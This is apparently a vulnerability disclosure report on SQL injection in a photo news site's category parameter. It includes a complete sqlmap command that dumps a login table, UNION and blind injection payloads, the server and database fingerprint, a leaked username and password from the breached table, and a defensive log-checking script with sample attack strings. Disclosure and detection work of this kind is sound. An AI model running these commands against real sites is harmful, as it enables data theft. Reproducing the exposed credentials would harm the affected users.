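2015-11-24: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
Photography can have many styles; in fact, some so-called styles arise from differences in geographic location and natural environment.
Address: http://**.**.**.**/news/newslist.php?selectCat=3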
$ python sqlmap.py -u "http://**.**.**.**/news/newslist.php?selectCat=3" -p selectCat --technique=BU --random-agent --batch --no-cast -D photonews -T jk_loguser -C u,p,ip,date --dump --start 1 --stop 5
Database: photonews
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| jk_loguser                  | 4945522 |
+-----------------------------+---------+
A small portion of the data is shown:
Database: photonews
Table: jk_loguser
[4 entries]
+---------+------------+-------------+----------------+
| u       | date       | p           | ip             |
+---------+------------+-------------+----------------+
|         | 2005-12-15 | jk:         | **.**.**.**    |
|         | 2005-12-15 | jk:         | **.**.**.**    |
|         | 2005-12-15 | jk:         | **.**.**.**    |
| netalex | 2005-12-15 | jk:12344312 | **.**.**.**    |
+---------+------------+-------------+----------------+
---
Parameter: selectCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: selectCat=3 AND 4996=4996

    Type: UNION query
    Title: MySQL UNION query (56) - 10 columns
    Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
current user: 'jacky@localhost'
current user is DBA: True
database management system users [8]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'jacky'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'shop'@'localhost'
available databases [44]
current database: 'photonews'

Database: photonews
Table: jk_loguser
[4 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| date   | date        |
| ip     | varchar(20) |
| p      | varchar(20) |
| u      | varchar(20) |
+--------+-------------+
Deploy a WAF.
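The rule such a filter would enforce for this parameter, as an added example that is not part of the original report: accept `selectCat` only when it is a single short run of digits, and flag every other request to `/news/newslist.php`. The log lines are constructed samples in combined log format, the addresses are documentation ranges, and the 1 to 6 digit shape of a category id is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the report); IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Nov/2015:10:00:01 +0800] "GET /news/newslist.php?selectCat=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Nov/2015:10:00:07 +0800] "GET /news/newslist.php?selectCat=3%20AND%204996%3D4996 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [24/Nov/2015:10:00:09 +0800] "GET /news/newslist.php?selectCat=3%20UNION%20ALL%20SELECT%2056,56,56%23 HTTP/1.1" 200 812',
    '192.0.2.10 - - [24/Nov/2015:10:00:12 +0800] "GET /news/newslist.php?selectCat=12&page=2 HTTP/1.1" 200 4301',
    '192.0.2.77 - - [24/Nov/2015:10:00:15 +0800] "GET /news/newslist.php?selectCat=3&selectCat=3%20AND%204996%3D4996 HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CATEGORY_ID_RE = re.compile(r"[0-9]{1,6}")  # assumed shape of a category id


def is_valid_select_cat(values):
    """Allow exactly one value, and only a short run of ASCII digits."""
    return len(values) == 1 and CATEGORY_ID_RE.fullmatch(values[0]) is not None


def check_line(line):
    """Return (client_ip, decoded_value) for a rejected request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/news/newslist.php"):
        return None
    # parse_qs URL-decodes values and keeps repeated parameters as a list,
    # so a duplicated selectCat (parameter pollution) is visible here.
    values = parse_qs(url.query, keep_blank_values=True).get("selectCat", [])
    if not values or is_valid_select_cat(values):
        return None
    return line.split(" ", 1)[0], " | ".join(values)


def rejected_requests(lines):
    """Collect every request whose selectCat fails the allow-list."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for ip, value in rejected_requests(SAMPLE_LOG):
        print(f"{ip}\tselectCat={value!r}")
```

The same digit-only check belongs in newslist.php itself, with the value bound as an integer parameter in the query, since a filter in front of the application only covers requests that pass through it.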
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-11-27 15:12
Referred to related parties.
None yet